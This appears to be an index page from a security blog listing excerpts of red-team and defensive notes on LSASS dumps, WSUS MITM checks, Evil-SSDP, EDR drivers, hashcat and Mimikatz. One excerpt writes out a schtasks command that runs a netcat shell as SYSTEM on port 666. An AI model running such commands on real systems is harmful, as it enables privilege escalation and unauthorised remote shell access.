Lsass Minidump file seen as Malicious by McAfee AV

Reading Time: 3 minutesThe other day, I was shadowing a colleague of me who was doing a red team. The client was running McAfee AV. While the reputation of that AV isn’t the best, it got a bit in the way for a few minutes. After doing a lateral movement, my...

xsoar demisto misc values / commands

Reading Time: < 1 minuteseverity-> Unknown (0), Informational (0.5), Low (1), Medium (2), High (3), Critical (4) To create a new docker with some lib dependancies (or update current one) /docker_image_create name=testdocker base=demisto/python3...

WSUS attacks

Reading Time: < 1 minuteto check if a Win domain is a possible candidate to a MITM WSUS attack check reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer...

Defend against Evil-SSDP

Reading Time: < 1 minuteEvil-SSDP can be found at https://github.com/initstring/evil-ssdp Disable your firewall to block SSDP netsh advfirewall firewall set rule group=”Network Discovery” new...

Cortex XDR components

Reading Time: < 1 minuteWdFilter.sys : antimalware, malware WdNisDrv.sys : defender cyvrfsfd.sys : Palo Alto Networks cyvrlpc.sys : Palo Alto Networks tedrdrv.sys : Palo Alto Networks cyvrmtgn.sys : Palo Alto Networks cyverak.sys : cyvera, Palo Alto Networks...

Windows from privilege level to SYSTEM

Reading Time: < 1 minuteA classic way to achieve this is via Scheduled Task Copy netcat to c:\temp (for example) schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR “c:\temp\nc.exe -e cmd -l -p 666” /ST 10:00:00 and then run it with Schtasks...

Hashcat

Reading Time: < 1 minutehttps://hashcat.net/hashcat/ and https://github.com/hashcat It’s a tool that let’s you bruteforce hashes. Hashcat 6.0 is the latest version and support around 208 different hash types ! You can use the CPU or the GPU to compute...

Defenses against Mimikatz

Reading Time: < 1 minuteas written in this blogpost mimikatz is an amazing tool to read password from a Window machine (either LSASS process, or Registry keys and other means). How can we defend against it ? Run LSASS process as “RunAsPPL”...